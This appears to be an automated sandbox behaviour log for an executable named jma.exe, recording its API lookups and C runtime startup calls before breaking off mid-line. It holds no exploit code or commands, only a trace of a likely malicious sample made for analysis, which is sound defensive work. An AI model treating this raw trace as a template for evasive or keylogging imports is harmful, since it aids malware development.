# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 07.11.2019 02:39:12.009 Process: id = "1" image_name = "jma.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jma.exe" page_root = "0x4e6c0000" os_pid = "0x964" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x968 [0025.865] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleMode") returned 0x76c4a77d [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleInputA") returned 0x76cd6f53 [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0025.866] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0025.867] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleCount") returned 0x76c3cb29 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedDecrement") returned 0x76c313f0 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0025.868] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0025.869] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0025.870] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathA") returned 0x76c5276c [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileA") returned 0x76c5d53e [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempFileNameA") returned 0x76c59d3f [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileA") returned 0x76c3e2ce [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLanguageGroupsA") returned 0x76cc51fa [0025.871] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventA") returned 0x76c3328c [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSetInformation") returned 0x76c35651 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleTitleA") returned 0x76cd67e3 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0025.872] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameA") returned 0x76c3e2c1 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeW") returned 0x76c3418b [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryA") returned 0x76c41834 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryA") returned 0x76c5d4f6 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryW") returned 0x76c41260 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryW") returned 0x76c35611 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedIncrement") returned 0x76c31400 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="GetWindowsDirectoryA") returned 0x76c52b0a [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0025.873] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0025.874] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0025.874] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0025.874] LoadLibraryA (lpLibFileName="ACTIVEDS.dll") returned 0x74b30000 [0025.874] GetProcAddress (hModule=0x74b30000, lpProcName=0x1d) returned 0x74b36d3d [0025.874] GetProcAddress (hModule=0x74b30000, lpProcName=0x1e) returned 0x74b36d83 [0025.874] LoadLibraryA (lpLibFileName="AVIFIL32.dll") returned 0x74ab0000 [0025.874] GetProcAddress (hModule=0x74ab0000, lpProcName="AVIFileCreateStreamA") returned 0x74ab6198 [0025.874] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0025.874] GetProcAddress (hModule=0x75ad0000, lpProcName="GetTextExtentPoint32A") returned 0x75aed349 [0025.874] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportOrgEx") returned 0x75ae86cc [0025.874] GetProcAddress (hModule=0x75ad0000, lpProcName="LineTo") returned 0x75aeb9e5 [0025.874] GetProcAddress (hModule=0x75ad0000, lpProcName="SetWindowExtEx") returned 0x75af1ace [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="ExcludeClipRect") returned 0x75aea066 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="SetMapMode") returned 0x75aeb02f [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="Ellipse") returned 0x75b14492 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="CreatePen") returned 0x75aeba4f [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportExtEx") returned 0x75af19e2 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateICA") returned 0x75ae7c2e [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="SetPixelFormat") returned 0x75b1594c [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="GetStockObject") returned 0x75ae4eb8 [0025.875] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateSolidBrush") returned 0x75ae4f17 [0025.876] GetProcAddress (hModule=0x75ad0000, lpProcName="TextOutA") returned 0x75aeeda3 [0025.876] GetProcAddress (hModule=0x75ad0000, lpProcName="MoveToEx") returned 0x75ae8ee6 [0025.876] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x74800000 [0025.876] GetProcAddress (hModule=0x74800000, lpProcName="GdiplusStartup") returned 0x74825600 [0025.876] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0025.876] GetProcAddress (hModule=0x75220000, lpProcName=0x1a5) returned 0x752526fa [0025.876] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0025.876] GetProcAddress (hModule=0x75fd0000, lpProcName="SHBrowseForFolderA") returned 0x7621dc6a [0025.876] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0025.876] GetProcAddress (hModule=0x75340000, lpProcName="StrChrA") returned 0x7534c5e6 [0025.876] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendA") returned 0x7534d65e [0025.876] GetProcAddress (hModule=0x75340000, lpProcName="PathCombineW") returned 0x7535c39c [0025.877] GetProcAddress (hModule=0x75340000, lpProcName="PathCreateFromUrlA") returned 0x7536c1e9 [0025.877] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsW") returned 0x753545bf [0025.877] GetProcAddress (hModule=0x75340000, lpProcName="PathBuildRootW") returned 0x7535b265 [0025.877] GetProcAddress (hModule=0x75340000, lpProcName="PathUnquoteSpacesA") returned 0x7536ecc7 [0025.877] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorA") returned 0x74f5dad5 [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="CheckMenuItem") returned 0x74f6a88c [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindow") returned 0x74f5926e [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="DialogBoxParamA") returned 0x74f9cb0c [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="ValidateRect") returned 0x74f67849 [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="EndPaint") returned 0x74f61341 [0025.877] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="SetCursor") returned 0x74f641f6 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="GetSystemMenu") returned 0x74f66ea6 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="ScreenToClient") returned 0x74f6227d [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowRect") returned 0x74f57f34 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowDC") returned 0x74f58048 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="FillRect") returned 0x74f60eb6 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemID") returned 0x74f6a725 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="SetKeyboardState") returned 0x74f814b2 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="SetCapture") returned 0x74f7ed56 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="GetSubMenu") returned 0x74f66d73 [0025.878] GetProcAddress (hModule=0x74f40000, lpProcName="LoadBitmapA") returned 0x74f67cc2 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="IsClipboardFormatAvailable") returned 0x74f68676 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="GetParent") returned 0x74f60f68 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="LoadMenuA") returned 0x74f74eef [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="LoadIconA") returned 0x74f5dafb [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="IsWindowEnabled") returned 0x74f62c1b [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="MenuItemFromPoint") returned 0x74fb874b [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="GetClientRect") returned 0x74f60c62 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="CreateMenu") returned 0x74f657a4 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageA") returned 0x74f6612e [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="BeginPaint") returned 0x74f61361 [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="GetIconInfo") returned 0x74f649ea [0025.879] GetProcAddress (hModule=0x74f40000, lpProcName="GetUpdateRect") returned 0x74f7d41f [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetDC") returned 0x74f572c4 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="DrawFocusRect") returned 0x74f689c2 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardState") returned 0x74f7ec68 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetForegroundWindow") returned 0x74f62320 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenu") returned 0x74f65041 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowPlacement") returned 0x74f62aca [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowTextA") returned 0x74f60029 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemRect") returned 0x74fb82ef [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="TrackPopupMenuEx") returned 0x74f7c2ac [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="GetAsyncKeyState") returned 0x74f7eb96 [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="SetRect") returned 0x74f60e1b [0025.880] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowLongA") returned 0x74f66110 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="MessageBoxA") returned 0x74fafd1e [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="UnionRect") returned 0x74f626a8 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="BringWindowToTop") returned 0x74f67b3b [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="CharLowerA") returned 0x74f63e75 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowLongA") returned 0x74f5d156 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="CreateWindowExA") returned 0x74f5d22e [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="SetClassLongA") returned 0x74f6d5f9 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="GetDlgItem") returned 0x74f7f1ba [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="EndDialog") returned 0x74f7b99c [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="DefWindowProcA") returned 0x771724e0 [0025.881] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowPos") returned 0x74f58e4e [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="GetCursorPos") returned 0x74f61218 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemInfoA") returned 0x74f673a1 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="AppendMenuA") returned 0x74fb67fb [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemCount") returned 0x74f6563b [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseCapture") returned 0x74f7ed49 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="InsertMenuA") returned 0x74fb67b8 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="SetWindowTextA") returned 0x74f67aee [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageW") returned 0x74f59679 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="UpdateWindow") returned 0x74f63559 [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="CallWindowProcA") returned 0x74f6792f [0025.882] GetProcAddress (hModule=0x74f40000, lpProcName="FindWindowA") returned 0x74f5ffe6 [0025.882] LoadLibraryA (lpLibFileName="WINTRUST.dll") returned 0x74de0000 [0025.883] GetProcAddress (hModule=0x74de0000, lpProcName="CryptCATGetMemberInfo") returned 0x74deec94 [0025.883] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0025.883] GetProcAddress (hModule=0x75bc0000, lpProcName=0x73) returned 0x75bc3ab2 [0025.883] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0025.883] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0025.883] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x975cd650, dwHighDateTime=0x1d59514)) [0025.883] GetCurrentProcessId () returned 0x964 [0025.883] GetCurrentThreadId () returned 0x968 [0025.883] GetTickCount () returned 0x1141eb8 [0025.883] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=14610595162) returned 1 [0025.883] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40c433)) [0025.883] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0025.884] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x1ce0000 [0025.884] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0025.884] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0025.884] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0025.884] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0025.884] GetProcAddress (hModule=0x76c20000, lpProcName="FlsFree") returned 0x76c3359f [0025.885] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x214) returned 0x1ce07d0 [0025.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0025.885] GetCurrentThreadId () returned 0x968 [0025.885] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40b04e, hStdOutput=0x40b387, hStdError=0x1ce07d0)) [0025.885] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x8, Size=0x800) returned 0x1ce09f0 [0025.885] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0025.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0025.886] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0025.886] SetHandleCount (uNumber=0x20) returned 0x20 [0025.886] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jma.exe\" " [0025.886] GetEnvironmentStringsW () returned 0x1dedcb0* [0025.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0025.886] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x565) returned 0x1ce11f8 [0025.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1ce11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0025.886] FreeEnvironmentStringsW (penv=0x1dedcb0) returned 1 [0025.886] GetLastError () returned 0x0 [0025.886] SetLastError (dwErrCode=0x0) [0025.886] GetLastError () returned 0x0 [0025.886] SetLastError (dwErrCode=0x0) [0025.886] GetLastError () returned 0x0 [0025.886] SetLastError (dwErrCode=0x0) [0025.886] GetACP () returned 0x4e4 [0025.886] RtlAllocateHeap (HeapHandle=0x1ce0000, Flags=0x0, Size=0x220) returned 0x1ce1768 [0025.886] GetLastError () returned 0x0 [0025.886] SetLastError (dwErrCode=0x0) [0025.886] IsValidCodePage (CodePage=0x4e4) returned 1 [0025.886] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0025.886] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0025.886] GetLastError () returned 0x0 [0025.886] SetLastError (dwErrCode=0x0) [0025.886] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0025.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0025.887] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0025.887] GetLastError () returned 0x0 [0025.887] SetLastError (dwErrCode=0x0) [0025.887] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) 